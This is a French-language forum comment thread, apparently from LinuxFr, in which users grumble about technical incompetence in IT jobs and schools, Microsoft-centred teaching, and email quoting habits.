          ;) On dirait que tu ne connais pas de prof... ;)

          Je suis entouré de prof. Mes amis, ma mere, mes voisins, ma meilleur copine... Et dans le lot, 45% le font pour les vacances, 45% le font parce qu'ils ne savaient pas quoi faire d'autre avec leur DESS ou leur DEA et que ca leur ouvr les portes du CAPEs, et les 10% restant le font vraiment par conviction...

          Bref, c'est un grand débat compliqué que l'édication...
    • [^] # Rien a voir

      Posté par  . Évalué à 1.

      brookes.ac.uk

      Brookes ? le Brookes a Oxford ? Ca fait 1 an que je vis a Wantage (bled peume 15 miles au sud) je cherche desesperement des gens a voir dans les environs.

      Y'a moyen de se faire une bouffe un soir ?
  • # Re: Les handicapés du Web...

    Posté par  . Évalué à 5.

    Entré dans le métier en 1986, je l'ai quitté sans regret en 2003.

    L'informatique n'est plus 'la chose bien faite' par des gens compétents mais un brol mal fait (mais qui tourne !!!) par des compétents du clic-clic ..

    Reste avec mon nux a la maison et adieu le stress.

    Bonne merde a ceux qui y reste.
    • [^] # Re: Les handicapés du Web...

      Posté par  . Évalué à 1.

      Et moi qui aimerais bien y entrer ... :-/
    • [^] # Re: Les handicapés du Web...

      Posté par  . Évalué à 4.

      c'est clair !
      je suis dans l'info depuis plus de 20 ans
      et y'a de plus en plus de neuneux chaque année
      et on dirait même que les neuneux de l'année prochaine sont en avance cette année
      (pour parodier Coluche)

      je travaille au support technique d'une boîte d'info
      on travaille avec des responsables informatiques qui installent les logiciels sur Windows server ou Unix,
      et ben des fois l'incompétence de certains fait peur (pas tous heureusement)
      aucune notion de l'administration d'un OS
      même que je leur demande par exemple : c'est quoi tous ces services qui tournent là sur Windows 2000 server ? pffff ils n'ont aucune idée ; bon je les blâme pas, c'est plutôt abscon les services dans Windows, mais le minimum pour un administrateur système c'est au moins de savoir ce qui tourne en mémoire, non ?
      vous par exemple, vous savez ce qui tourne en mémoire de votre machine Linux, oui ?

      des fois tu te demandes.....
    • [^] # Re: Les handicapés du Web...

      Posté par  . Évalué à 3.

      Juste une question par curiosité, c'est quoi ton métier de reconversion ?

      Un coiffeur, un pub spéciale Guinness...

      Cette question est assez sérieuse parce que je travaille dans l'info et que je pense que l'info devrais rester un hobby.
  • # Re: Les handicapés du Web...

    Posté par  (site web personnel, Mastodon) . Évalué à 7.

    Dis-donc, moi qui croyais qu'il n'y avait personne sur DLFP le dimanche soir et encore moins de gens capables de lire un journal aussi longs..

    Y'a quand même une chiée de commentaires, dont la majorité il est vrai, trollant pour savoir si répondre au dessus c'est mieux ou pas.

    Je répondrais :

    "Répondre à un email, c'est comme faire l'Amour. Parfois c'est mieux au-dessus, parfois c'est mieux au-dessous, souvent c'est un peu des deux."

    Mes livres CC By-SA : https://ploum.net/livres.html

    • [^] # Re: Les handicapés du Web...

      Posté par  . Évalué à 2.

      Rooh je m'insurge!!!

      On trolle tu trouves?
      Je fais plein d'effort pour eviter le troll justement et etre bien precis, avec des arguments, je prend mon temps pour mes reponses, je ne fais pas qu'exposer mon avis, j'essai d'expliquer, demontrer.
      Et m'sieur tramo et Beurt font de meme.

      Un troll c une discussion sterile qui ne mene a rien où personne n'ecoute l'autre.
      Dans note discussion J'ai trouvé les aguments des uns et des autres tres valables, j'ai eu l'impression que mes arguments etaient lus, analysés, respectés et du coup ils y ont répondu.
      C'est un echange, pas un troll.

      Meu nan on trolle pas

      Si on trolle? Mais un dimanche, avec tous ces chasseurs en liberté, il doit pas y avoi bcp de trolls dehors!

      Clap clap pour ta réponse, au passage.
    • [^] # Re: Les handicapés du Web...

      Posté par  . Évalué à 2.

      Allez pour te faire passer une mauvaise soirée...

      En choisissant une bonne fac tu peux avoir un etage entier de machines en dual boot windows/linux, des serveurs Tru64 (beurk) et solaris. Les machines en dual boot sont 99% du temps sous linux et sous windows uniquement quand des Deugs se trompent d'etage :-)

      Pire certain trouvent gnome trop "windows" et une majorité de personne bosse sous fvwm ! Bon c'est un peu moins vrai depuis que les PII on ete changés pour des PIV 2.6Ghz.

      C'est pas super bien administré, j'ai jamais vu de reseau de fac bien administré/sécurisé mais c'est utilisable. Au pire on se fait un ptit ~/bin de 50/100Mo pour ce qu'il manque.

      Comme quoi... !

      Pour contre tout les portables que j'ai vu (access wifi/lan) sont sous win XP... Ou mac OS X puisqu'on a quelques fanatique d'Apple (attention un intaigriste linux n'est rien a cote d'un fanatique d'Apple)

      Vala mauvaise IUT changer IUT !
  • # Re: Les handicapés du Web...

    Posté par  . Évalué à 1.

    Je crois qu'on dit "technopate".

    Enzo Bricolo
  • # Re: Les handicapés du Web...

    Posté par  . Évalué à 2.

    Dans la catégorie lire-le-français-c'est-vachement-dur :

    "Je ne peux lire votre mail car nos deux textes se sont mélangés sur le serveur. Veuillez réenvoyer votre mail".

    pareil, plus la mention :

    de plus les caractères accentués s'affiche mal, c'est sans doute du à une défaillance de votre messagerie, veuillez utiliser un encodage de caractères universel (sic)
  • # Re: Les handicapés du Web...

    Posté par  (site web personnel) . Évalué à 2.

    ben moi je me suis fait avoir aussi dans une école supérieure en options 'Réseaux Informatique'... résultat :

    - Pas bcp d'info (élec à fond car pas de prof assez doués)
    - Pas d'anglais (pas trouvé de prof donc -> élec)

    Info :

    En prog :

    - Pascal et Delphi (sous wiwi évidement)
    - M$ VisualBasic .NET (sans commentaires)

    Pour le prof, le C est mort et on devrais plus l'enseigner (remarque: il ne connais pas le C ce prof là, il nous l'a avoué qd même. Celui-ci trouve que les cours de C devraient être remplacé par du C#, ce qui devrait être fait l'année prochaine)

    En réseau :

    - Prof d'élec recruté (c'est sa 1ere année) ....
    différence entre un hub et un switch : ben heuuuuu...
    combien de ports peut-on utiliser en TCP/IP en sachant que c'est sur 2 octets : heuuu 32000 ?

    enfin, c'est toujours mieux que mon ancien prof de réseau qui ne savait pas ce que c'était un DNS (...), bien que je ne lui ai pas demandé au nouveau prof tiens...

    Au labo :

    une dixaines de machines sous Microsoft XP ou 2000 srv sur lequelles on travaille en admin... (le w2000 srv, c quand le dernier qui est passé à bousillé le XP ... c l'OS de secours bien qu'a l'origine, c pour la formation NT des dernière année)

    les disques dur en racks car il y a aussi des disques de récup avec RH 7.2 pour la formation UNIX des dernière année (genre : cd, mkdir, ls etc.... (pas d'admin de serveurs bien entendu... IIS est la pour ça (...)))

    Anéctodes :

    - M'sieur, ma machine ne boote ni sur XP ni sur 2000 srv (BSOD), puis-je travailler sous linux ?
    - Heuuu, non, ça ne marche pas avec 'dev-pascal' (qui au passage, utilise GNU pascal compiler (GPC)). On va te réinstaller Windows XP.
    - heuuu (...)

    De + les cours UNIX vont bientot etre supprimé car les profs/élèves s'en fouttent et préfèrent 'administrer' (clic-clic) sur w2000 srv (voire 2003).... (et que le prof de UNIX ne connait que les commandes citées plus haut)

    J'ai vu sur le bureau du prof un bon gros bouquin de Microsoft Press... sur IIS6... je ne me fait donc pas d'illusions...

    Dans les autres cours... les rapports et exposés doivent êtres rendu en .doc OBLIGATOIRE sinon c zéro ... j'ai remandé pour le pdf voire meme le rtf et non !

    Les cours sont fournis en .doc, les horaires de ceux ci sont en .xls et certains cours utilisent aussi le .ppt ... parfois des .pdf mais c'est très rare... et les programmes d'entrainement (QCM) pour certains cours sont fait à l'école sous delphi et fournis en .exe

    Quand je leurs parle d'OOo ou meme de GNU/Linux, ils me regarde d'un air bizzare comme si j'étais un extra-terrestre et me demandent pourquoi je veux me faire remarquer avec mes truc alors que 'tout le monde' utilise M$ ... depuis tout le monde m'appelle Mr Linux...

    PS : J'ai arrêté cette école... j'en pouvais plus...

Suivre le flux des commentaires

Note : les commentaires appartiennent à celles et ceux qui les ont postés. Nous n’en sommes pas responsables.